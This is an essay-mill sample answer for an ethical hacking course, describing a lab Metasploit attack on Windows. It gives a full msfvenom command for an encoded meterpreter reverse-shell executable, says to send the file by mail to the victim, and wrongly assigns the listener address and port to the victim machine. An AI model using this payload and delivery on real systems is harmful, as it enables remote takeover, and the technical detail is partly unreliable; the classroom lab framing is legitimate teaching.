Question? Call Us  +1 (817) 546-4770

CSI3508 Ethical Hacking And Defence

Academic Anxiety?

Get an original paper within hours and nail the task

156 experts online

Free Samples

CSI3508 Ethical Hacking And Defence

.cms-body-content table{width:100%!important;} #subhidecontent{ position: relative;
overflow-x: auto;
width: 100%;}

CSI3508 Ethical Hacking And Defence

0 Download3 Pages / 662 Words

Course Code: CSI3508
University: Edith Cowan University is not sponsored or endorsed by this college or university

Country: Australia


You are to write a technical outline of how the exploit you developed in the workshop operates, from the initial connection, through to compromise.
You should target a primarily non-technical audience in your report.
Formatting Requirements

Approximately two pages
Font: times new roman, size 11

Effective penetration testing with Metasploit framework and methodologies.
Penetration testing a hands-on introduction to hacking.


In the workshop, we came up with Kali Linux Metasploit exploit whose target would mainly be on the windows operating systems (windows XP, 7, 8, 8.1 and 10). This exploit would enable an attacker get into the victim’s machine and do a number of operations just as if logged in. metasploit is basically a project that helps in penetration testing and development of ID signatures. The tool helps in the development of an exploit code as well as its execution in a targeted remote machine (Dieterle, 2016).
For this test our requirements were; a metasploit framework with the entire Ruby packages which we installed in a Kali Linux Operating system computer, two machines, one with a windows operating system and another with a Kali Linux OS. The two machines were allowed to operate in the same NAT network. Because an antivirus would prevent the attack, we ensured that the target machine did not have any antivirus software (Holik, Horalek, Marik, Neradova & Zitta, 2014, p.240). The Metasploit command which we used throughout our penetration test was the Msfconsole simply because of its flexibility and other additional features which supported the tools within the framework.
For us to be in a position to penetrate into the second machine which was operating on a windows platform, we first had to be aware of the machine’s IP address and one of its free PORT numbers which we easily acquired considering that the two machines were operating in the same network. An IP address of a machine operating within the same network can be obtained easily using software called Netcut (Muniz, 2013).
Now to get a chance of penetrating into the second machine, we first of all created an executable file within the Kali Linux platform under the IP address and PORT number specification of the second machine using the command “msfvenom –p windows/meterpreter/reverse_tcp LHOST= (IP address of windows machine) LPORT= (PORT in the windows machine) –f exe –e x86/shikata_ga_nai –i 10> /root/desktop/ (desktop name).exe”
The command allowed us to create an executable folder in the Kali Linux platform and which contained several .exe files. This is the collection of files which we were supposed to send to the target machine through channels line mail or else through the network (Pritchett & De Smet, 2013).
After we send the file to the target machine, we were entitled to activate our metasploit framework into a listening status using the “exploit” command at the Msfconsole handler status. So, when it’s set on a listening mode, it waits until the file send to the victim machine is opened. When the file sent to the victim machine is eventually opened by the victim, on the side of Kali Linux platform “meterpreter” activates itself automatically.
At this juncture, the attacker is inside the victim’s machine and can carry out several operations with full control just like a person who has logged into the system physically. Some of the activities the attacker can do on the victim’s machine include reading the contents of the files on the screen, changing directories, editing files, deleting files, searching for files, uploading files changing local directories, printing local directories, removing directories, moving source to destination, and printing working directories (Weidman, 2014).  This implies that the attacker has already hacked into the victim’s computer.
Dieterle, D. W. (2016). Basic Security Testing with Kali Linux. CreateSpace Independent Publishing Platform.
Holik, F., Horalek, J., Marik, O., Neradova, S., & Zitta, S. (2014, November). Effective penetration testing with Metasploit framework and methodologies. In Computational Intelligence and Informatics (CINTI), 2014 IEEE 15th International Symposium on (pp. 237-242). IEEE.
Muniz, J. (2013). Web Penetration Testing with Kali Linux. Packt Publishing Ltd.
Pritchett, W. L., & De Smet, D. (2013). Kali Linux Cookbook. Packt Publishing Ltd
Weidman, G. (2014). Penetration testing: a hands-on introduction to hacking. No Starch Press.

Free Membership to World’s Largest Sample Bank

To View this & another 50000+ free samples. Please put
your valid email id.


Yes, alert me for offers and important updates


Download Sample Now

Earn back the money you have spent on the downloaded sample by uploading a unique assignment/study material/research material you have. After we assess the authenticity of the uploaded content, you will get 100% money back in your wallet within 7 days.

UploadUnique Document

DocumentUnder Evaluation

Get Moneyinto Your Wallet

Total 3 pages


*The content must not be available online or in our existing Database to qualify as

Cite This Work
To export a reference to this article please select a referencing stye below:


My Assignment Help. (2021). Ethical Hacking And Defence. Retrieved from

“Ethical Hacking And Defence.” My Assignment Help, 2021,

My Assignment Help (2021) Ethical Hacking And Defence [Online]. Available from:[Accessed 18 December 2021].

My Assignment Help. ‘Ethical Hacking And Defence’ (My Assignment Help, 2021) accessed 18 December 2021.

My Assignment Help. Ethical Hacking And Defence [Internet]. My Assignment Help. 2021 [cited 18 December 2021]. Available from:

.close{position: absolute;right: 5px;z-index: 999;opacity: 1;color: #ff8b00;}


Thank you for your interest
The respective sample has been mail to your register email id


$20 Credited
successfully in your wallet.
* $5 to be used on order value more than $50. Valid for
only 1

Account created successfully!
We have sent login details on your registered email.



Our specially curated generators have been revolutionary in helping the students cite resources (books, online articles, journals, websites, etc.). You have to visit our site and provide the details related to the resource. If you have Chicago referencing style requirements, Chicago reference generator will provide you with the final layout. Similarly, the Vancouver reference generator or Harvard reference generator will yield corresponding results. Thus, your issues with referencing style are permanently resolved. The reference generator related to APA is ideal for APA referencing assignments. Furthermore, you get the results instantly without you having to wait for delayed outputs.

Latest Management Samples

div#loaddata .card img {max-width: 100%;

MPM755 Building Success In Commerce
Download :
0 | Pages :

Course Code: MPM755
University: Deakin University is not sponsored or endorsed by this college or university

Country: Australia

The process of developing a successful business entity requires a multidimensional analysis of several factors that relate to the internal and external environment in commerce. The areas covered in this current unit are essential in transforming the business perspective regarding the key commerce factors such as ethics, technology, culture, entrepreneurship, leadership, culture, and globalization (Nzelibe, 1996; Barza, 2…

SNM660 Evidence Based Practice
Download :
0 | Pages :

Course Code: SNM660
University: The University Of Sheffield is not sponsored or endorsed by this college or university

Country: United Kingdom

Critical reflection on the objective, design, methodology and outcome of the research undertaken Assessment-I
Smoking and tobacco addiction is one of the few among the most basic general restorative issues, particularly to developed nations such as the UK. It has been represented that among all risk segments smoking is the fourth driving purpose behind infections and other several ailments like asthma, breathing and problems in the l…
Australia Maidstone Management Business management with marketing University of New South Wales Masters in Business Administration 

BSBHRM513 Manage Workforce Planning
Download :
0 | Pages :

Course Code: BSBHRM513
University: Tafe NSW is not sponsored or endorsed by this college or university

Country: Australia

Task 1
1.0 Data on staff turnover and demographics
That includes the staffing information of JKL industries for the fiscal year of 2014-15, it can be said that the company is having problems related to employee turnover. For the role of Senior Manager in Sydney, the organization needs 4 managers; however, one manager is exiting. It will make one empty position which might hurt the decision making process. On the other hand, In Brisba…

MKT2031 Issues In Small Business And Entrepreneurship
Download :
0 | Pages :

Course Code: MKT2031
University: University Of Northampton is not sponsored or endorsed by this college or university

Country: United Kingdom

Entrepreneurial ventures
Entrepreneurship is the capacity and willingness to develop, manage, and put in order operations of any business venture with an intention to make profits despite the risks that may be involved in such venture. Small and large businesses have a vital role to play in the overall performance of the economy. It is, therefore, necessary to consider the difference between entrepreneurial ventures, individual, and c…
Turkey Istanbul Management University of Employee Masters in Business Administration 

MN506 System Management
Download :
0 | Pages :

Course Code: MN506
University: Melbourne Institute Of Technology is not sponsored or endorsed by this college or university

Country: Australia

An operating system (OS) is defined as a system software that is installed in the systems for the management of the hardware along with the other software resources. Every computer system and mobile device requires an operating system for functioning and execution of operations. There is a great use of mobile devices such as tablets and Smartphones that has increased. One of the widely used and implemented operating syste…
Australia Cheltenham Computer Science Litigation and Dispute Management University of New South Wales Information Technology 


Need an essay written specifically to meet your requirements?

Choose skilled experts on your subject and get an original paper within your deadline

156 experts online

Your time is important. Let us write you an essay from scratch

Tips and Tricks from our Blog

PROJ6016 Employer Based Project

Free Samples PROJ6016 Employer Based Project .cms-body-content table{width:100%!important;} #subhidecontent{ position: relative; overflow-x: auto; width: 100%;} PROJ6016 Employer

Read More »

PPMP20009 Marking Rubric

Free Samples PPMP20009 Marking Rubric .cms-body-content table{width:100%!important;} #subhidecontent{ position: relative; overflow-x: auto; width: 100%;} PPMP20009 Marking Rubric

Read More »